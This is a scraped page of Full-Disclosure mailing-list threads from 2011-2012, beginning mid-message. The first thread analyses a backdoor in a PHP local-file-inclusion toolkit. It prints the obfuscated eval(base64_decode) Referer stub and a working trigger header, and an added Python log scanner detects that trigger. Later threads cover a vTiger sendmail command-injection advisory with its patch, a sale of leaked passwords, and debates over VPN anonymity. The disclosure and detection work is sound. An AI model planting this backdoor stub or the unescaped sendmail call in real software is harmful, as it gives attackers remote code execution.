>>> tool, but I did see it used in a few "priv8" PHP shells too.
>>>
>>> On Sun, 19 Feb 2012 19:32:13 +0200, Anestis Bechtsoudis
>>>  wrote:
>>> > The backdoor PHP code that you included is exactly the same as
>>> > generated by Weevely [1] tool, until the 0.4 version of the tool.
>>> >
>>> > For convenience I include the base64 decoded Weevely code here too:
>>> >
>>> > ini_set('error_log','/dev/null');
>>> > parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='my' &&
>>> > count($a)==9) {echo '';eval(base64_decode(str_replace(" ", "+",
>>> > join(array_slice($a,count($a)-3);echo '';}
>>> >
>>> >
>>> > For more details you can refer to a relevant post I wrote recently [2].
>>> >
>>> > I haven't dug into "r00t 4 LFI" source code, but from your analysis the
>>> > similarities are pretty obvious.
>>> >
>>> > ps: This email has been BCC'ed to Weevely developer.
>>> >
>>> >
>>> > [1] http://code.google.com/p/weevely/
>>> > [2] https://bechtsoudis.com/security/put-weevely-on-the-your-nids-radar/
>>> >
>>> >
>>> > On 02/19/2012 07:01 PM, InterN0T Advisories wrote:
>>> >> Dear Full Disclosure readers,
>>> >>
>>> >>
>>> >> Today I saw Joe McCray among others, tweet about the (new) "r00t 4 LFI
>>> >> Toolkit", that according to its description:
>>> >> ---
>>> >> This tool is a php script that assists in performing local file
>>> >> inclusion attacks.
>>> >> ---
>>> >>
>>> >> Should be able to perform local file inclusion attacks.
>>> >>
>>> >>
>>> >> -:: Overview ::-
>>> >>
>>> >> After studying this tool for a brief 5 minutes, it was obvious that it
>>> >> was nowhere what I hoped it to be, as the tool only uses one method, the
>>> >> "/proc/self/environ" vector (as seen on e.g., the intern0t forums and
>>> >> many other sites).
>>> >>
>>> >> The tool is therefore, not capable of performing "attacks", but only 1,
>>> >> single type of LFI attack. (Note that the 'S' has been removed.)
>>> >>
>>> >> The method this tool uses, is far from new and doesn't always work
>>> >> either, but it's a nice trick that e.g., SirGod wrote about on the
>>> >> intern0t forums in 2009. (This tool was released the 18th February 2012.)
>>> >>
>>> >>
>>> >> -:: Vulnerabilities ::-
>>> >>
>>> >> Further study of this tool reveals:
>>> >> - None of the output from the tool is sanitized, meaning the attacker
>>> >> using the script, can get XSS'd (and CSRF'd), if the target has changed
>>> >> e.g., the 'uname -a' command (which is relatively simple to do), to
>>> >> include (print) JavaScript instead. If this happens, the attacker may end
>>> >> up attacking himself, crashing or something third, depending on the type
>>> >> of XSS payload.
>>> >>
>>> >> - The most interesting part, is on line 92, where the "developer"
>>> >> (KedAns-Dz), has decided to >>backdoor<< the tool.
>>> >>
>>> >>
>>> >> -:: The Backdoor ::-
>>> >>
>>> >> Analysis of the backdoor:
>>> >> By sending a HTTP request, that includes a specially crafted referer, it
>>> >> is possible to execute PHP code:
>>> >> ---
>>> >> Referer: a1=iz&a2=&a3=&a4=&a5=&a6=&a7=&a8=&a0=cGhwaW5mbygpOw==
>>> >> ---
>>> >>
>>> >>
>>> >> This referer will make the script execute: phpinfo();
>>> >>
>>> >>
>>> >> -:: Code Review ::-
>>> >>
>>> >> The code that enables the developer to use the script as a backdoor
>>> >> looks like the following:
>>> >> ---
>>> >> parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' &&
>>> >> count($a)==9) { echo '';eval(base64_decode(str_replace(" ", "+",
>>> >> join(array_slice($a,count($a)-3);echo '';}
>>> >> ---
>>> >>
>>> >>
>>> >> It certainly took a little bit of study to trigger, but in essence
>>> >> here's what it does:
>>> >> 1. Parse the HTTP Referer string into variable: $a ("Referer:" is not
>>> >> included.)
>>> >> 2. If the first array value (not key / arg), is a string named: iz
>>> >> 3. And if there's 9 (different) arrays, then
>>> >> 4. Print out the contents of..
>>> >>
>>> >>
>>> >> This requires a bit more in-depth explanation:
>>> >> A) Evaluate the following as PHP code:
>>> >> B) Base64_decode the in
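
The trigger analysed in this thread leaves a recognisable shape in web server logs: a Referer that parses into exactly nine parameters whose last three values, joined, are valid base64. The following is an added detection example, not code from any of the posters or from the Weevely project; the log lines, request path and addresses are constructed, and the check keys on structure because the marker value differs between the two samples quoted above ('iz' and 'my').

```python
import base64
import binascii
import re
import string
from urllib.parse import parse_qsl

# Constructed access-log lines in Apache combined format. Only the Referer in
# the second line is taken from the thread; everything else is invented.
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Feb/2012:10:00:01 +0000] "GET /index.php HTTP/1.1" '
    '200 512 "http://example.com/search?q=a&b=1" "Mozilla/5.0"',
    '198.51.100.23 - - [19/Feb/2012:10:00:07 +0000] "GET /tools/lfi.php HTTP/1.1" '
    '200 48211 "a1=iz&a2=&a3=&a4=&a5=&a6=&a7=&a8=&a0=cGhwaW5mbygpOw==" "Mozilla/5.0"',
    '203.0.113.9 - - [19/Feb/2012:10:00:09 +0000] "GET /style.css HTTP/1.1" '
    '200 901 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [19/Feb/2012:10:00:12 +0000] "GET /p HTTP/1.1" 200 77 '
    '"http://example.com/p?a=1&b=2&c=3&d=4&e=5&f=6&g=7&h=8&i=9" "Mozilla/5.0"',
]

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')


def backdoor_payload(referer):
    """Return the decoded payload if the Referer has the trigger's shape."""
    if not referer or referer == "-":
        return None
    # Like PHP's parse_str, treat the whole header as a query string. A dict
    # keeps one entry per key, which mirrors what count($a) would see.
    params = dict(parse_qsl(referer, keep_blank_values=True))
    if len(params) != 9:
        return None
    # The stub joins the last three values and turns spaces back into '+',
    # because query-string decoding maps '+' to a space.
    blob = "".join(list(params.values())[-3:]).replace(" ", "+")
    if not blob:
        return None
    try:
        raw = base64.b64decode(blob, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, ValueError):
        return None
    if not text or any(ch not in string.printable for ch in text):
        return None
    return text


def scan_log(lines):
    """Yield one finding per log line whose Referer matches the shape."""
    findings = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            continue
        payload = backdoor_payload(m.group("referer"))
        if payload is not None:
            findings.append({"ip": m.group("ip"), "time": m.group("time"),
                             "request": m.group("request"), "payload": payload})
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["request"], "->", repr(hit["payload"]))
```

The check does not require a scheme-less Referer, since the stub only inspects parsed values and a URL prefix can sit in the first key. Any hit is worth following up by searching the served PHP files for `eval(base64_decode(` applied to request headers.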

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-25 Thread Benji
Yes it does.

wp-admin/setup-config.php?step=1 on any wp install where it exists gives
this:

The file 'wp-config.php' already exists one level above your WordPress
installation. If you need to reset any of the configuration items in this
file, please delete it first.


On Wed, Jan 25, 2012 at 4:11 PM, Julius Kivimäki
wrote:

> Funny but no, this does not need a non-installed wordpress.
>
>
> 2012/1/25 Benji 
>
>> Dear full-disclosure
>>
>> I wrote to you to tell you about serious serious vulnerability in all
>> Windows versions.
>>
>> If you turn machine on before system is configured, then you be able to
>> set user password yourself, big gaping hole
>>
>> I make big large botnet to fully utilise this impressive vulnerability!
>> thegrugq said i could sell this for liike 3 ferrari's and 1 russian wife, i
>> say nay though! Big time russian mobster offer me diamond, i say nay! I
>> like report vuln of this size responsibility in so hope to make more
>> money^H^H^H^H^H^H^Hsecure world.
>>
>> Please full-disclosure, this vuln is serious and i plead you shut down
>> all windows now.
>>
>> I wrote metasploit module! It find new installs turned off machine, WOL
>> and i go to house and enter password! FULL SYSTEM OWNED! Big botnets! Many
>> wifes!
>>
>>
>>
>>
>> On Wed, Jan 25, 2012 at 2:49 PM, Tim Brown  wrote:
>>
>>> On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote:
>>>
>>> > There is A LOT of these open installation pages in the Internet. It is
>>> > not uncommon to leave those open by accident. Some people also do this,
>>> > because they just don't understand the risks. I am wondering if
>>> > WordPress would apply patch if we create one as a collaborative effort.
>>> > I would be more than happy to help creating a patch for this if this is
>>> > the case.
>>>
>>> I may have missed something, but does simply having the file exposed
>>> make you vulnerable.  From looking at it, it starts off with a bunch of
>>> file_exists(), which essentially evaluate if you've installed or not and
>>> wp_die() if you have.
>>> Tim
>>> --
>>> Tim Brown
>>> <mailto:t...@65535.com>

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-25 Thread Benji
Dear full-disclosure

I wrote to you to tell you about serious serious vulnerability in all
Windows versions.

If you turn machine on before system is configured, then you be able to set
user password yourself, big gaping hole

I make big large botnet to fully utilise this impressive vulnerability!
thegrugq said i could sell this for liike 3 ferrari's and 1 russian wife, i
say nay though! Big time russian mobster offer me diamond, i say nay! I
like report vuln of this size responsibility in so hope to make more
money^H^H^H^H^H^H^Hsecure world.

Please full-disclosure, this vuln is serious and i plead you shut down all
windows now.

I wrote metasploit module! It find new installs turned off machine, WOL and
i go to house and enter password! FULL SYSTEM OWNED! Big botnets! Many
wifes!




On Wed, Jan 25, 2012 at 2:49 PM, Tim Brown  wrote:

> On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote:
>
> > There is A LOT of these open installation pages in the Internet. It is
> > not uncommon to leave those open by accident. Some people also do this,
> > because they just don't understand the risks. I am wondering if WordPress
> > would apply patch if we create one as a collaborative effort. I would be
> > more than happy to help creating a patch for this if this is the case.
>
> I may have missed something, but does simply having the file exposed make
> you vulnerable.  From looking at it, it starts off with a bunch of
> file_exists(), which essentially evaluate if you've installed or not and
> wp_die() if you have.
>
> Tim
> --
> Tim Brown
> 

Re: [Full-disclosure] Google open redirect

2011-12-08 Thread Benji
>>IMHO, 500$ is an incredibly minute amount to give even for a error
>>message information disclosure/an open redirect,
>>researchers with bills can't make a living like that.. although it
>>might? be okay for students.

I wasn't being "strange", you pretty much implied it.

On Thu, Dec 8, 2011 at 3:03 PM, Charles Morris  wrote:

> Don't be strange, was I not specific enough?
>
> I think people should be encouraged to do the work,
> if they are good enough to find something that nobody else has noticed yet-
> and all of these "cash for bugs" programs have me a bit annoyed.
>
> Not offering the money for issues that they claim to offer for issues
> is not only dishonest but it is discouraging to beginning researchers.
>
> I've personally seen it happen.
>
> On Thu, Dec 8, 2011 at 9:57 AM, Benji  wrote:
> > Sorry, you think people should be making a living off reporting open
> > redirect disclosure?
> >
>

Re: [Full-disclosure] Google open redirect

2011-12-08 Thread Benji
Sorry, you think people should be making a living off reporting open
redirect disclosure?

On Thu, Dec 8, 2011 at 2:53 PM, Charles Morris  wrote:

> Michal/Google,
>
> IMHO, 500$ is an incredibly minute amount to give even for a error
> message information disclosure/an open redirect,
> researchers with bills can't make a living like that.. although it
> might? be okay for students.
>
> How many Google vulnerabilities per month are there expected to be?
> Granted there are other avenues to pursue for a fledgling researcher,
>
> What is the cost to Google's business if an open redirect causes their
> image to be tarnished
> by some arbitrary amount in the eyes of some percentage of consumers?
>
> Considering Google grossed 30 billion dollars in 2010, (ridiculous) I
> would expect that the numbers
> we are talking about perhaps are so massive that 500$ is nothing in
> comparison.
>
> We live in an age that pays 5k, or 30k, or 100k for a root level
> compromise, in a common package with a reliable and solid exploit. At
> least that's what I hear.
>
> Even if everyone else's opinion says "500$ is too much for a redirect",
> doesn't Google want to promote the industry by sharing a little of the
> wealth to people with good intentions and ability?
>
> It's time to raise the bar a little here, and I'm not just talking about
> bounty.
>
> Why would Google ever suffer from these issues to begin with?
> Can't Google, in its infinite wisdom and 30 billion dollars, come up with
> a better solution for whatever random problem they are trying to solve
> with an open redirect?
>
>
> n.b. I have never sold a vulnerability, even when non-pittance sums are
> offered
>
> /rant
>
> On Thu, Dec 8, 2011 at 12:15 AM, Michal Zalewski 
> wrote:
> >> _Open_ URL redirectors are trivially prevented by any vaguely sentient
> >> web developer as URL redirectors have NO legitimate use from outside
> >> one's own site so should ALWAYS be implemented with Referer checking
> >
> > There are decent solutions to lock down some classes of open
> > redirectors (and replace others with direct linking), but "Referer"
> > checking isn't one of them. It has several subtle problems that render
> > it largely useless in real-world apps.
> >
> ...
> > We have a vulnerability reward program, and it's just about not paying
> > $500 for reports of that vulnerability - along with not paying for
> > many other minimal-risk problems such as path disclosure.
> >
> > /mz

Re: [Full-disclosure] Large password list

2011-12-01 Thread Benji
Which country is "UNIQPASS" registered as a tm?


On Fri, Dec 2, 2011 at 1:47 AM, adam  wrote:

> >>- reduce abuse
>
> The concerning part is that you're serious. Tell me, how does someone
> paying for a list of STOLEN passwords reduce abuse?
>
> This email, your obsession with LulzSec and the disclaimer on your site
> make it pretty clear where the information is coming from, so what kind of
> abuse potential does this have by someone not paying? And who are you to
> not only take credit, but also demand payment, for other peoples' efforts?
>
> I'm partly tempted to buy and post the list here just to spite you for
> being so idiotic.
>
> On Thu, Dec 1, 2011 at 7:16 PM, Addy Yeow  wrote:
>
>> There are many password lists already available for free out in the wild
>> but mostly lack the quality.
>>
>> The minimal fee for UNIQPASS is necessary to help:
>> - keep ongoing effort to improve the quality of the list over time
>> - ensure frequent updates, i.e. when new leaked databases appear
>> (existing users of UNIQPASS get updated copy for free)
>> - cover cost of upstream bandwidth, the list is currently at  64MB
>> compressed and new versions are likely to only get larger
>> - reduce abuse
>>
>> On Fri, Dec 2, 2011 at 1:33 AM, Fabio Pietrosanti (naif) <
>> li...@infosecurity.ch> wrote:
>>
>>> On 12/1/11 6:14 PM, Addy Yeow wrote:
>>> > I thought some of you may find this large password list useful, over 27
>>> > million entries.
>>> > http://dazzlepod.com/uniqpass/ (it's a paid list though, at $4.99)
>>>
>>> Anyone linking a warez version (Why pay $4.99?) ?
>>>
>>> -naif

Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default

2011-11-21 Thread Benji
Oh thank god, this thread has now become a case of 'look how big my penis
will be in x amount of months'.

On Mon, Nov 21, 2011 at 12:24 PM, Darren Martyn <
d.martyn.fulldisclos...@gmail.com> wrote:

> Jason has a good point. Now to make a simple statement - I am not (nor was
> I) agreeing with the Ubuntu bashing in this, merely stating a point that it
> puts user friendliness over security AT TIMES. I only switched distro for I
> had... Disagreements... with Ubuntu's Wireless stack in installations more
> recent than 10.04LTS.
>
> I still run 10.04 "Netbook Remix" on the occasion that I have access to a
> netbook (I no longer own even a desktop) and like it, it does the bloody
> job, is easy to install rapidly, and does not require much fucking about
> with. Sure, the purists may demand one compiles kernel from source, reads
> parts (or all) of the src to look for POSSIBLE bugs, etc, and "builds their
> own Linux", but I find that 8/10 times that is impractical, an unnecessary
> complication, or merely too time consuming.
>
> Just as an aside, my goal once I acquire my own computer (or rather, a
> replacement for the boxes I no longer have) is to do the following:
> 1) Read the latest kernels source over a long period of time, looking for
> bugs and to get a better understanding of how it works on that level
> 2) Build my own distro
> 3) Write my own network manager based off the LORCON/MadWiFi drivers
> (using PyLORCON bindings) for the GNOME interface to replace the
> not-reliable "network manager" applet.
>
> Is there anyone else on the list with similar aspirations to understand
> the underlying OS on that level or is everyone content with simply bitching
> about distros?
>
> On Mon, Nov 21, 2011 at 10:27 AM, Jason A. Donenfeld wrote:
>
>> Hello Full Disclosure Hysterics & Friends,
>>
>> I have now read through five dozen complaints about how Ubuntu
>> is fundamentally an "unsecure" operating system, filled with more holes
>> than Swiss cheese.
>>
>> If somebody could direct me toward a local root exploit against a fully
>> up-to-date Ubuntu 11.04 or 11.10 that attacks a piece of software that is
>> installed by default, I would be most impressed and persuaded by your
>> assertions, as well as being very appreciative.
>>
>> Thank you,
>> Management
>
> --
> My Homepage :D 

Re: [Full-disclosure] vTiger CRM 5.2.x <= Remote Code Execution Vulnerability

2011-10-06 Thread Benji
and where in vTiger is this manipulatable from?

On Wed, Oct 5, 2011 at 11:02 AM, YGN Ethical Hacker Group wrote:

> vTiger CRM 5.2.x <= Remote Code Execution Vulnerability
>
>
> 1. OVERVIEW
>
> The vTiger CRM 5.2.1 and lower versions are vulnerable to Remote Code
> Execution. No fixed version has been released as of 2011-10-05.
>
>
> 2. BACKGROUND
>
> vtiger CRM is a free, full-featured, 100% Open Source CRM software
> ideal for small and medium businesses, with low-cost product support
> available to production users that need reliable support. vtiger CRM
> is a widely used product with thousands of users in dozens of
> countries.  It has a vibrant community of users driving the product
> forward, and contributing to its development.  Over 2 million copies
> of vtiger CRM have been downloaded so far. It was launched as a fork
> of version 1.0 of the SugarCRM project launched on December 31st,
> 2004.
>
>
> 3. VULNERABILITY DESCRIPTION
>
> vTiger uses the vulnerable version of phpmailer class file located at
> /cron/class.phpmailer.php .
>
>
> 4. VERSIONS AFFECTED
>
> Tested on 5.2.1
>
>
> 5. PROOF-OF-CONCEPT/EXPLOIT
>
> File: /cron/class.phpmailer.php
> [code]
>
> 391:function SendmailSend($header, $body) {
> 392:if ($this->Sender != "")
> 393:   $sendmail = sprintf("%s -oi -f %s -t", $this->Sendmail, $this->Sender);
> 394:else
> 395:   $sendmail = sprintf("%s -oi -t", $this->Sendmail);
>
> [/code]
>
>
> 6. SOLUTION
>
> The vendor hasn't attempted to incorporate the latest version of
> phpMailer class in their vTigerCRM as of version 5.2.1.
>
> The flawed code portion can be patched with:
>
> 393: $sendmail = sprintf("%s -oi -f %s -t", escapeshellcmd($this->Sendmail), escapeshellarg($this->Sender));
> 395: $sendmail = sprintf("%s -oi -t", escapeshellcmd($this->Sendmail));
>
>
> 7. VENDOR
>
> vTiger Development Team
> http://www.vtiger.com/
>
>
> 8. CREDIT
>
> This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
> Ethical Hacker Group, Myanmar.
>
>
> 9. DISCLOSURE TIME-LINE
>
> 2010-12-08: notified vendor
> 2011-10-05: no fixed version released yet
> 2011-10-05: vulnerability disclosed
>
>
> 10. REFERENCES
>
> Original Advisory URL:
> http://yehg.net/lab/pr0js/advisories/%5BvTiger_5.2.1%5D_rce
> Wiki VtigerCRM: https://secure.wikimedia.org/wikipedia/en/wiki/Vtiger_CRM
> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3215
>
> #yehg [2011-10-05]

Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member

2011-09-29 Thread Benji
No, you are wrong.

Either; the vpn provider complied with court order, or they face the legal
ramifications of not doing so. User location is irrelevant.

On Thu, Sep 29, 2011 at 2:04 PM, xD 0x41  wrote:

> indeed :)
> but, it is how a proper anon person would operate, well, tht is how i once
> did...
> anyhow, it is to broad, and, yes, i qwould never believe in bulletproof,
> unless i have used it maybe, for 10yrs, thru 10 botnets ;P wich, is very
> rare but funnily, possible.
> webhosters, are even more corrupt and better at hiding data.. face it, if
> the vpn provider had not shat themself, then it would be a non story.
>
>
>
>
> On 29 September 2011 23:00, Benji  wrote:
>
>> 'Abuse' emails and court orders are very different.
>>
>> On Thu, Sep 29, 2011 at 1:59 PM, xD 0x41  wrote:
>>
>>> err, you are limited in those countries dude... id really checkup on that
>>> ... maybe some but, yea i agree, i dont think any hosting is anon, but, i
>>> sure know i have kept an anon dedis in past, and was VERY easy to avoid
>>> handing anything over. Unless they had personally seized from my company, i
>>> was allowed to basically get away with, and if i want to, again, could do
>>> the same  'anonymously' and, indeed keep those details, away.
>>> it is not frigin hard dude, where did Yyou get the idea, that is not hard
>>> to move a user around boxes :P
>>>  and rename them, etc etc etc, always change ipv6 tunnels... there is
>>> somany ways, you obv have not ran a dedicated server in a company
>>> environment coz boi, they hide nets on legit hostin now, legit apparently*
>>> companies...and they do it using those simple means, and, even show logs of
>>> them 'removing and deleting' files of the apprent 'bad user' , this is, a
>>> whole different level than even needing to deal with cops.. so, you are
>>> scared too much by laws  wich can be smokescreened.
>>> Run a dedis, or simply ask a admin, howmany abuse they get, and howmany
>>> users they actually rm ;)
>>> you would want this service, on your vps ?
>>> i surely wouldnt,. i know, with me, if i offer anon, you stay damn anon,
>>> if you bring cops to MY HOUSE, then i may have to try and, simply keep my
>>> darn data secure ey ?
>>> how about that ?
>>> simple methods, defeat simple plans benji.
>>> xd
>>>
>>>
>>>
>>> On 29 September 2011 22:53, Benji  wrote:
>>>
>>>> Yes they do. If you buy a server in America for example, even if you are
>>>> located in Russia, they are required by federal law to hand over your
>>>> details wherever you may reside. I dont know where you've obtained this
>>>> idea that they can't.
>>>>
>>>> Just because something is advertised as 'anonymous' doesnt mean it's 'so
>>>> anonymous you can break the law' and anyone using a EU/US-related country
>>>> to do this is either stupid or naive.
>>>>
>>>> On Thu, Sep 29, 2011 at 1:50 PM, xD 0x41  wrote:
>>>>
>>>>> They advertised as anonymous VPN to 'everyone'.
>>>>> Then, that would mean, especially NOT locally, thats something wich is
>>>>> also, subject to federal laws though so, in its own country, the provider
>>>>> may have to, nomatter whats advertised, BUT outside of country customers,
>>>>> should not be handed over.
>>>>> isp's here dont do it, and havent, for like 20 yrs, they also do not
>>>>> take down people,issue nor execute other peoples 'takedown orders', there 
>>>>> is
>>>>> many reasons for this but basically, they loose money from it.
>>>>> Anyhow, in UK, you maybe right, but outside of there, then, they should
>>>>> have maybe not advertised as anononymous vpn services for everyone and
>>>>> anyone. thats obvious crap we know now.
>>>>> anyhow, cheers,
>>>>> xd
>>>>>
>>>>>
>>>>>
>>>>> On 29 September 2011 22:45, Benji  wrote:
>>>>>
>>>>>> Im sorry, why is it 'worrying' that a vpn provider that was a UK
>>>>>> business and was located in the UK, is subject to UK law?
>>>>>>
>>>>>>
>>>>>>
>>>>>> On Thu, Sep 29, 2011 at 9:51 AM, Darren Martyn <
>>>>>> d.martyn.fulldi

Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member

2011-09-29 Thread Benji
And in that case, if you're trusting someone else to keep you anonymous,
again, you are stupid and naive.

Honestly, by now you would think people would know: do everything yourself,
trust no-one.

On Thu, Sep 29, 2011 at 2:04 PM,  wrote:

> On Thu, 29 Sep 2011 13:53:03 BST, Benji said:
>
> > Just because something is advertised as 'anonymous' doesnt mean it's 'so
> > anonymous you can break the law' and anyone using a EU/US-related country
> > to do this is either stupid or naive.
>
> There's also those servers that advertise "anonymous and likely to stay
> that way because we've bought a few corrupt government officials".  But if
> you're buying services from them, you're neither stupid nor naive, and know
> *exactly* why you're doing business with them

Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member

2011-09-29 Thread Benji
'Abuse' emails and court orders are very different.

On Thu, Sep 29, 2011 at 1:59 PM, xD 0x41  wrote:

> err, you are limited in those countries dude... i'd really check up on that
> ... maybe some but, yea i agree, i don't think any hosting is anon, but, i
> sure know i have kept an anon dedis in past, and was VERY easy to avoid
> handing anything over. Unless they had personally seized from my company, i
> was allowed to basically get away with, and if i want to, again, could do
> the same  'anonymously' and, indeed keep those details, away.
> it is not frigin hard dude, where did you get the idea, that is not hard
> to move a user around boxes :P
>  and rename them, etc etc etc, always change ipv6 tunnels... there is
> so many ways, you obv have not ran a dedicated server in a company
> environment coz boi, they hide nets on legit hostin now, legit apparently*
> companies...and they do it using those simple means, and, even show logs of
> them 'removing and deleting' files of the apparent 'bad user' , this is, a
> whole different level than even needing to deal with cops.. so, you are
> scared too much by laws  which can be smokescreened.
> Run a dedis, or simply ask a admin, how many abuse they get, and how many
> users they actually rm ;)
> you would want this service, on your vps ?
> i surely wouldn't,. i know, with me, if i offer anon, you stay damn anon, if
> you bring cops to MY HOUSE, then i may have to try and, simply keep my darn
> data secure ey ?
> how about that ?
> simple methods, defeat simple plans benji.
> xd
>
>
>
> On 29 September 2011 22:53, Benji  wrote:
>
>> Yes they do. If you buy a server in America for example, even if you are
>> located in Russia, they are required by federal law to hand over your
>> details wherever you may reside. I don't know where you've obtained this idea
>> that they can't.
>>
>> Just because something is advertised as 'anonymous' doesn't mean it's 'so
>> anonymous you can break the law' and anyone using a EU/US-related country to
>> do this is either stupid or naive.
>>
>> On Thu, Sep 29, 2011 at 1:50 PM, xD 0x41  wrote:
>>
>>> They advertised as anonymous VPN to 'everyone'.
>>> Then, that would mean, especially NOT locally, that's something which is
>>> also, subject to federal laws though so, in its own country, the provider
>>> may have to, no matter what's advertised, BUT outside of country customers,
>>> should not be handed over.
>>> isp's here don't do it, and haven't, for like 20 yrs, they also do not take
>>> down people,issue nor execute other peoples 'takedown orders', there is many
>>> reasons for this but basically, they lose money from it.
>>> Anyhow, in UK, you maybe right, but outside of there, then, they should
>>> have maybe not advertised as anonymous vpn services for everyone and
>>> anyone. that's obvious crap we know now.
>>> anyhow, cheers,
>>> xd
>>>
>>>
>>>
>>> On 29 September 2011 22:45, Benji  wrote:
>>>
>>>> I'm sorry, why is it 'worrying' that a vpn provider that was a UK
>>>> business and was located in the UK, is subject to UK law?
>>>>
>>>>
>>>>
>>>> On Thu, Sep 29, 2011 at 9:51 AM, Darren Martyn <
>>>> d.martyn.fulldisclos...@gmail.com> wrote:
>>>>
>>>>> Again, I hope this does not fail to send.
>>>>> The reasoning behind the "Pure Elite" recruitment channel was A: to
>>>>> recruit some talented people (and, by all accounts, there were some talented
>>>>> programmers there) and B: development and idle talk. Now more interesting
>>>>> was the reasoning behind the name - by putting the developers and coders and
>>>>> potential recruits in a channel named "Pure Elite", it was essentially an
>>>>> ego boost for the new guys, made them feel valued, etc, when in fact most
>>>>> were but pawns to be used (IMHO).
>>>>>
>>>>> This co-operation between VPN providers and LEO, while being nothing
>>>>> new - remember how hushmail caved in - is indeed worrying for those of us
>>>>> who are privacy advocates as well as security researchers.
>>>>>
>>>>> On a more direct note, Laurelei, do not presume that you know all there
>>>>> is to know about them. Doing so would be foolish. (Now don't go assuming
>>>>> that I hate you, I

Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member

2011-09-29 Thread Benji
Yes they do. If you buy a server in America for example, even if you are
located in Russia, they are required by federal law to hand over your
details wherever you may reside. I don't know where you've obtained this idea
that they can't.

Just because something is advertised as 'anonymous' doesn't mean it's 'so
anonymous you can break the law' and anyone using a EU/US-related country to
do this is either stupid or naive.

On Thu, Sep 29, 2011 at 1:50 PM, xD 0x41  wrote:

> They advertised as anonymous VPN to 'everyone'.
> Then, that would mean, especially NOT locally, that's something which is
> also, subject to federal laws though so, in its own country, the provider
> may have to, no matter what's advertised, BUT outside of country customers,
> should not be handed over.
> isp's here don't do it, and haven't, for like 20 yrs, they also do not take
> down people,issue nor execute other peoples 'takedown orders', there is many
> reasons for this but basically, they lose money from it.
> Anyhow, in UK, you maybe right, but outside of there, then, they should
> have maybe not advertised as anonymous vpn services for everyone and
> anyone. that's obvious crap we know now.
> anyhow, cheers,
> xd
>
>
>
> On 29 September 2011 22:45, Benji  wrote:
>
>> I'm sorry, why is it 'worrying' that a vpn provider that was a UK business
>> and was located in the UK, is subject to UK law?
>>
>>
>>
>> On Thu, Sep 29, 2011 at 9:51 AM, Darren Martyn <
>> d.martyn.fulldisclos...@gmail.com> wrote:
>>
>>> Again, I hope this does not fail to send.
>>> The reasoning behind the "Pure Elite" recruitment channel was A: to
>>> recruit some talented people (and, by all accounts, there were some talented
>>> programmers there) and B: development and idle talk. Now more interesting
>>> was the reasoning behind the name - by putting the developers and coders and
>>> potential recruits in a channel named "Pure Elite", it was essentially an
>>> ego boost for the new guys, made them feel valued, etc, when in fact most
>>> were but pawns to be used (IMHO).
>>>
>>> This co-operation between VPN providers and LEO, while being nothing new
>>> - remember how hushmail caved in - is indeed worrying for those of us who
>>> are privacy advocates as well as security researchers.
>>>
>>> On a more direct note, Laurelei, do not presume that you know all there
>>> is to know about them. Doing so would be foolish. (Now don't go assuming
>>> that I hate you, I bear you bugger all ill-will, etc).
>>> Good day.
>>>
>>>
>>> On Wed, Sep 28, 2011 at 5:44 AM, Laurelai Storm 
>>> wrote:
>>>
>>>> It's all good dude. What really concerns me is that vpn providers might
>>>> give over logs to oppressive regimes. TOR is starting to look better and
>>>> better.
>>>> On Sep 27, 2011 11:40 PM, "GloW - XD"  wrote:
>>>> > never did... was only for one buttcheek kid that i was a little pissed and
>>>> > thinking things which, prolly were wrong at the time...
>>>> > I am adult enough to apologise for what happened back then, and hopefully it
>>>> > is just, cool.
>>>> > :)
>>>> > cheers, your loved by many, you just have many trollers to :sp
>>>> > take care ,
>>>> > xd
>>>> >
>>>> >
>>>> > On 28 September 2011 14:32, Laurelai Storm wrote:
>>>> >
>>>> >> I'm surprised, someone on the internet who *doesn't * hate me :p
>>>> >> On Sep 27, 2011 11:29 PM, "GloW - XD"  wrote:
>>>> >> > Hello Laurelai ,
>>>> >> > Oh i agree it is still a terrible precedent to be set.. I don't even know
>>>> >> > where, legally, i stand anymore...
>>>> >> > It is rather disturbing, no matter WHO it was laurela.
>>>> >> > I am all for the hatred against the VPN provs, and this is not just
>>>> >> > happening here, and i made a BIG statement about this, and privacy, in my
>>>> >> > channel on efnet, first as i saw it.
>>>> >> >
>>>> >> > Then saw a torrentfreak feed,of someone who was an owner of a huge torrent
>>>> >> > site, was handed to authorities, not by the hoster, no... but by the
>>>> 
